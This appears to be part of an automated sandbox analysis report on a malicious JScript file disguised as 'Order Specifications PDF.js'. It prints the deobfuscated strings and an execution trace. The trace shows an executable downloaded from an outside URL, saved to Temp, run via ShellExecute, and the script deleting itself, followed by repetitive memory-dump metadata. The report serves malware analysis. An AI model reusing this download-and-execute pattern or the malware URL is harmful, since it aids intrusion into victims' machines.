                                                                                                                                                                                                                                                                                                                                                • _0x3974() ➔ uqtdR8kPceWHW5tdNW,ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsSoAc0BdH0GfCq,279BGVghm,WQLhE3xcLSkBWQ5naCorW6xdUq,bYVcLCkh,uSkzW6xdIW,ECoyWQGeWQzGhSkBtMlcPW,RzXUsr,W4SFgdRcImkKWOiD,abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=,w1vrmSoRW7VdJCkJWOVdGaldVq,WQtdNh4FpYK,AJirxSkZWOCCya9JWPhdJG,shift,WPBcTCoPW5misfRdSN7dL8oPbq,W4BcISoRW5qtgXxcIx3cPCog,EMpdGSkmdSoXsCk+W6u,428748eDivLq,q2iIW7/cNf9lcq/cV8k6WOb2,fromCharCode,vUkl,ksRdUCk9FSoRWOxcRCoVrsJdTd3dMuXWWOJdRmo+W4PIiZNdHCoUp8kjW7FdTSkaW4z6WRhcUwaO,length,WOVdSmovWONdJZGXzKNdMfxcOmo2rq,Bhsp,4(*W,qCVKfY,WRNdUKyZlrG,W5pdICkQkCk1WQ53WQZdRCo6tSoA,W6LlWOT6F3X+W7JdK8od,DeleteFile,W4ZdJrRdRue,421620Dulpsf,282elZIVv,W6JcQSofWRK,Scripting.FileSystemObject,BQ9o,1268392teACcP,Send,WPtdR14Ihq9nfCkFdKFcSCoRW7ddMeKt,AXxcQSkOWRG,WOZcHCkvkCo+WOXZnuxcKKbM,W4yuy1BdPSoFWOOIgCo6qge,bs19WQHMoNZdH8oAW5eX,W69VWRvm,10MQXdOq,AJ3cTmowW6WowIz1WO5WW4O,WR8BoCkPbXTiCCo9cW,WQ3cNSkvBW,8ApAyti,WQquW65/F8ol,W)L8,https://tgc8x.tk/tt/VNZVNCXKKJSF.exe,A1dcS8k4WPddG8kRWRq2W5j8FJmjumkfhSkMwmoDcCorW6rjW7tdNrW,WPRdHSkOWQrddhC,charCodeAt,push,76392yWuOtG,W73dVr7dRxtcHSkIW4xcK27cLSoWWOa,5991OPUtAM,13285611Ofkcqp,ScriptFullName,Position,nmkoFSotW53cKq,yxSPWPPSBJW,AJCsxmk1WOXXxYPeWPJdSmoB,dXnloCodW7pcV8k0
                                                                                                                                                                                                                                                                                                                                                • _0x3974() ➔ uqtdR8kPceWHW5tdNW,ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsSoAc0BdH0GfCq,279BGVghm,WQLhE3xcLSkBWQ5naCorW6xdUq,bYVcLCkh,uSkzW6xdIW,ECoyWQGeWQzGhSkBtMlcPW,RzXUsr,W4SFgdRcImkKWOiD,abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=,w1vrmSoRW7VdJCkJWOVdGaldVq,WQtdNh4FpYK,AJirxSkZWOCCya9JWPhdJG,shift,WPBcTCoPW5misfRdSN7dL8oPbq,W4BcISoRW5qtgXxcIx3cPCog,EMpdGSkmdSoXsCk+W6u,428748eDivLq,q2iIW7/cNf9lcq/cV8k6WOb2,fromCharCode,vUkl,ksRdUCk9FSoRWOxcRCoVrsJdTd3dMuXWWOJdRmo+W4PIiZNdHCoUp8kjW7FdTSkaW4z6WRhcUwaO,length,WOVdSmovWONdJZGXzKNdMfxcOmo2rq,Bhsp,4(*W,qCVKfY,WRNdUKyZlrG,W5pdICkQkCk1WQ53WQZdRCo6tSoA,W6LlWOT6F3X+W7JdK8od,DeleteFile,W4ZdJrRdRue,421620Dulpsf,282elZIVv,W6JcQSofWRK,Scripting.FileSystemObject,BQ9o,1268392teACcP,Send,WPtdR14Ihq9nfCkFdKFcSCoRW7ddMeKt,AXxcQSkOWRG,WOZcHCkvkCo+WOXZnuxcKKbM,W4yuy1BdPSoFWOOIgCo6qge,bs19WQHMoNZdH8oAW5eX,W69VWRvm,10MQXdOq,AJ3cTmowW6WowIz1WO5WW4O,WR8BoCkPbXTiCCo9cW,WQ3cNSkvBW,8ApAyti,WQquW65/F8ol,W)L8,https://tgc8x.tk/tt/VNZVNCXKKJSF.exe,A1dcS8k4WPddG8kRWRq2W5j8FJmjumkfhSkMwmoDcCorW6rjW7tdNrW,WPRdHSkOWQrddhC,charCodeAt,push,76392yWuOtG,W73dVr7dRxtcHSkIW4xcK27cLSoWWOa,5991OPUtAM,13285611Ofkcqp,ScriptFullName,Position,nmkoFSotW53cKq,yxSPWPPSBJW,AJCsxmk1WOXXxYPeWPJdSmoB,dXnloCodW7pcV8k0
                                                                                                                                                                                                                                                                                                                                                • _0x3974() ➔ uqtdR8kPceWHW5tdNW,ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsSoAc0BdH0GfCq,279BGVghm,WQLhE3xcLSkBWQ5naCorW6xdUq,bYVcLCkh,uSkzW6xdIW,ECoyWQGeWQzGhSkBtMlcPW,RzXUsr,W4SFgdRcImkKWOiD,abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=,w1vrmSoRW7VdJCkJWOVdGaldVq,WQtdNh4FpYK,AJirxSkZWOCCya9JWPhdJG,shift,WPBcTCoPW5misfRdSN7dL8oPbq,W4BcISoRW5qtgXxcIx3cPCog,EMpdGSkmdSoXsCk+W6u,428748eDivLq,q2iIW7/cNf9lcq/cV8k6WOb2,fromCharCode,vUkl,ksRdUCk9FSoRWOxcRCoVrsJdTd3dMuXWWOJdRmo+W4PIiZNdHCoUp8kjW7FdTSkaW4z6WRhcUwaO,length,WOVdSmovWONdJZGXzKNdMfxcOmo2rq,Bhsp,4(*W,qCVKfY,WRNdUKyZlrG,W5pdICkQkCk1WQ53WQZdRCo6tSoA,W6LlWOT6F3X+W7JdK8od,DeleteFile,W4ZdJrRdRue,421620Dulpsf,282elZIVv,W6JcQSofWRK,Scripting.FileSystemObject,BQ9o,1268392teACcP,Send,WPtdR14Ihq9nfCkFdKFcSCoRW7ddMeKt,AXxcQSkOWRG,WOZcHCkvkCo+WOXZnuxcKKbM,W4yuy1BdPSoFWOOIgCo6qge,bs19WQHMoNZdH8oAW5eX,W69VWRvm,10MQXdOq,AJ3cTmowW6WowIz1WO5WW4O,WR8BoCkPbXTiCCo9cW,WQ3cNSkvBW,8ApAyti,WQquW65/F8ol,W)L8,https://tgc8x.tk/tt/VNZVNCXKKJSF.exe,A1dcS8k4WPddG8kRWRq2W5j8FJmjumkfhSkMwmoDcCorW6rjW7tdNrW,WPRdHSkOWQrddhC,charCodeAt,push,76392yWuOtG,W73dVr7dRxtcHSkIW4xcK27cLSoWWOa,5991OPUtAM,13285611Ofkcqp,ScriptFullName,Position,nmkoFSotW53cKq,yxSPWPPSBJW,AJCsxmk1WOXXxYPeWPJdSmoB,dXnloCodW7pcV8k0
                                                                                                                                                                                                                                                                                                                                                return _0x42fe7d;
                                                                                                                                                                                                                                                                                                                                                  };
                                                                                                                                                                                                                                                                                                                                                    return _0x3974 ( );
                                                                                                                                                                                                                                                                                                                                                    • _0x3974() ➔ dXnloCodW7pcV8k0,uqtdR8kPceWHW5tdNW,ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsSoAc0BdH0GfCq,279BGVghm,WQLhE3xcLSkBWQ5naCorW6xdUq,bYVcLCkh,uSkzW6xdIW,ECoyWQGeWQzGhSkBtMlcPW,RzXUsr,W4SFgdRcImkKWOiD,abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=,w1vrmSoRW7VdJCkJWOVdGaldVq,WQtdNh4FpYK,AJirxSkZWOCCya9JWPhdJG,shift,WPBcTCoPW5misfRdSN7dL8oPbq,W4BcISoRW5qtgXxcIx3cPCog,EMpdGSkmdSoXsCk+W6u,428748eDivLq,q2iIW7/cNf9lcq/cV8k6WOb2,fromCharCode,vUkl,ksRdUCk9FSoRWOxcRCoVrsJdTd3dMuXWWOJdRmo+W4PIiZNdHCoUp8kjW7FdTSkaW4z6WRhcUwaO,length,WOVdSmovWONdJZGXzKNdMfxcOmo2rq,Bhsp,4(*W,qCVKfY,WRNdUKyZlrG,W5pdICkQkCk1WQ53WQZdRCo6tSoA,W6LlWOT6F3X+W7JdK8od,DeleteFile,W4ZdJrRdRue,421620Dulpsf,282elZIVv,W6JcQSofWRK,Scripting.FileSystemObject,BQ9o,1268392teACcP,Send,WPtdR14Ihq9nfCkFdKFcSCoRW7ddMeKt,AXxcQSkOWRG,WOZcHCkvkCo+WOXZnuxcKKbM,W4yuy1BdPSoFWOOIgCo6qge,bs19WQHMoNZdH8oAW5eX,W69VWRvm,10MQXdOq,AJ3cTmowW6WowIz1WO5WW4O,WR8BoCkPbXTiCCo9cW,WQ3cNSkvBW,8ApAyti,WQquW65/F8ol,W)L8,https://tgc8x.tk/tt/VNZVNCXKKJSF.exe,A1dcS8k4WPddG8kRWRq2W5j8FJmjumkfhSkMwmoDcCorW6rjW7tdNrW,WPRdHSkOWQrddhC,charCodeAt,push,76392yWuOtG,W73dVr7dRxtcHSkIW4xcK27cLSoWWOa,5991OPUtAM,13285611Ofkcqp,ScriptFullName,Position,nmkoFSotW53cKq,yxSPWPPSBJW,AJCsxmk1WOXXxYPeWPJdSmoB
                                                                                                                                                                                                                                                                                                                                                    }
                                                                                                                                                                                                                                                                                                                                                      Stream[_0x445216 ( 0xcd, '^pwq' ) ] ( ), Stream[_0x115fc7 ( 0x88 ) ] = 0x1, Stream[_0x445216 ( 0xf1, 'h2t$' ) ] ( Object['ResponseBody'] ), Stream[_0x115fc7 ( 0x90 ) ] = 0x0, Stream[_0x115fc7 ( 0x7c ) ] ( pOut, 0x2 ), Stream[_0x445216 ( 0xe8, 'zn0Y' ) ] ( ), new ActiveXObject ( _0x115fc7 ( 0x6e ) ) [_0x56566c ( 0x10d ) ] ( pOut, '', '', _0x155c25 ( 0x7d, 'vUkl' ), '1' ), new ActiveXObject ( _0x155c25 ( 0x77, _0x445216 ( 0xf5, 'J(3^' ) ) ) [_0x115fc7 ( 0x76 ) ] ( WScript[_0x56566c ( 0x106 ) ] );
                                                                                                                                                                                                                                                                                                                                                      • _0x445216(205,"^pwq") ➔ "Open"
                                                                                                                                                                                                                                                                                                                                                      • Open() ➔ undefined
                                                                                                                                                                                                                                                                                                                                                      • _0x115fc7(136) ➔ "Type"
                                                                                                                                                                                                                                                                                                                                                      • _0x445216(241,"h2t$") ➔ "Write"
                                                                                                                                                                                                                                                                                                                                                      • Write() ➔ undefined
                                                                                                                                                                                                                                                                                                                                                      • _0x115fc7(144) ➔ "Position"
                                                                                                                                                                                                                                                                                                                                                      • _0x115fc7(124) ➔ "SaveToFile"
                                                                                                                                                                                                                                                                                                                                                      • SaveToFile("C:\Users\engineer\AppData\Local\Temp\VNZVNCXKKJSF.exe",2) ➔ undefined
                                                                                                                                                                                                                                                                                                                                                      • _0x445216(232,"zn0Y") ➔ "Close"
                                                                                                                                                                                                                                                                                                                                                      • Close() ➔ undefined
                                                                                                                                                                                                                                                                                                                                                      • _0x115fc7(110) ➔ "Shell.Application"
                                                                                                                                                                                                                                                                                                                                                      • _0x56566c(269) ➔ "ShellExecute"
                                                                                                                                                                                                                                                                                                                                                      • _0x155c25(125,"vUkl") ➔ "open"
                                                                                                                                                                                                                                                                                                                                                      • ShellExecute("C:\Users\engineer\AppData\Local\Temp\VNZVNCXKKJSF.exe","","","open","1") ➔ undefined
                                                                                                                                                                                                                                                                                                                                                      • _0x445216(245,"J(3^") ➔ "UEHS"
                                                                                                                                                                                                                                                                                                                                                      • _0x155c25(119,"UEHS") ➔ "Scripting.FileSystemObject"
                                                                                                                                                                                                                                                                                                                                                      • _0x115fc7(118) ➔ "DeleteFile"
                                                                                                                                                                                                                                                                                                                                                      • _0x56566c(262) ➔ "ScriptFullName"
                                                                                                                                                                                                                                                                                                                                                      • DeleteFile("C:\Users\engineer\Desktop\Order Specifications PDF.js") ➔ undefined
                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.626756317.0000000002D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_2d10000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                                                        • String ID: k
                                                                                                                                                                                                                                                                                                                                                        • API String ID: 0-1164933156
                                                                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.628240669.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_2db0000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.626756317.0000000002D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_2d10000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                        • API String ID:
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000B.00000002.626756317.0000000002D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_2d10000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000B.00000002.628240669.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_2db0000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Uniqueness

Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 0000000B.00000002.627763086.0000000002D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D80000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_2d80000_powershell.jbxd
Similarity
• API ID:
• String ID: D04l$Xc4l$Xc4l
• API String ID: 0-3191032078
Uniqueness

Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 0000000B.00000002.627763086.0000000002D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D80000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_2d80000_powershell.jbxd
Similarity
• API ID:
• String ID: `oDk$`oDk
• API String ID: 0-1666140645
Uniqueness

Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 0000000B.00000002.626471703.0000000002CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_2cf0000_powershell.jbxd
Similarity
• API ID:
• String ID: DK4l$DK4l
• API String ID: 0-2437688437
Uniqueness

Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 0000000B.00000002.628240669.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_2db0000_powershell.jbxd
Similarity
• API ID:
• String ID: @ k$`oDk
• API String ID: 0-969093136
                                                                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.628240669.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_2db0000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                                                        • String ID: `oDk$`oDk
                                                                                                                                                                                                                                                                                                                                                        • API String ID: 0-1666140645
                                                                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.628240669.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_2db0000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                                                        • String ID: `oDk$`oDk
                                                                                                                                                                                                                                                                                                                                                        • API String ID: 0-1666140645
                                                                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.626471703.0000000002CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_2cf0000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                                                        • String ID: (j$(j
                                                                                                                                                                                                                                                                                                                                                        • API String ID: 0-3238734073
                                                                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.628240669.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_2db0000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                                                        • String ID: `oDk$`oDk
                                                                                                                                                                                                                                                                                                                                                        • API String ID: 0-1666140645
                                                                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.626471703.0000000002CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_2cf0000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                                                        • String ID: j$ j
                                                                                                                                                                                                                                                                                                                                                        • API String ID: 0-4110318802
Uniqueness
Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 0000000B.00000002.628240669.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_2db0000_powershell.jbxd
Similarity
• API ID:
• String ID: `oDk
• API String ID: 0-396138195
Uniqueness
Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 0000000B.00000002.628240669.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_2db0000_powershell.jbxd
Similarity
• API ID:
• String ID: d
• API String ID: 0-2564639436
Uniqueness
Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 0000000B.00000002.626756317.0000000002D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_2d10000_powershell.jbxd
Similarity
• API ID:
• String ID: L1j
• API String ID: 0-3909831282
Uniqueness
Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 0000000B.00000002.627763086.0000000002D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D80000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_2d80000_powershell.jbxd
Similarity
• API ID:
• String ID: `oDk
• API String ID: 0-396138195
Uniqueness
Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 0000000B.00000002.626756317.0000000002D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_2d10000_powershell.jbxd
Similarity
• API ID:
• String ID: L1j
• API String ID: 0-3909831282
Uniqueness
Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 0000000B.00000002.628240669.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_2db0000_powershell.jbxd
Similarity
• API ID:
• String ID: Tp3l
• API String ID: 0-2176149498
                                                                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.627763086.0000000002D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D80000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_2d80000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                                                        • String ID: `oDk
                                                                                                                                                                                                                                                                                                                                                        • API String ID: 0-396138195
                                                                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.627763086.0000000002D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D80000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_2d80000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                                                        • String ID: @ k
                                                                                                                                                                                                                                                                                                                                                        • API String ID: 0-3025011885
                                                                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.628240669.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_2db0000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                                                        • String ID: `oDk
                                                                                                                                                                                                                                                                                                                                                        • API String ID: 0-396138195
                                                                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.627763086.0000000002D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D80000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_2d80000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                                                        • String ID: @ k
                                                                                                                                                                                                                                                                                                                                                        • API String ID: 0-3025011885
                                                                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.627763086.0000000002D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D80000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_2d80000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                                                        • String ID: D04l
                                                                                                                                                                                                                                                                                                                                                        • API String ID: 0-4000787298
Uniqueness

Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 0000000B.00000002.628240669.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_2db0000_powershell.jbxd
Similarity
• API ID:
• String ID: Tp3l
• API String ID: 0-2176149498
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000B.00000002.627763086.0000000002D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D80000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_2d80000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000B.00000002.627763086.0000000002D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D80000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_2d80000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000B.00000002.628240669.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_2db0000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000B.00000002.626756317.0000000002D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_2d10000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000B.00000002.627763086.0000000002D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D80000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_2d80000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000B.00000002.628240669.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_2db0000_powershell.jbxd
Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                        • API String ID:
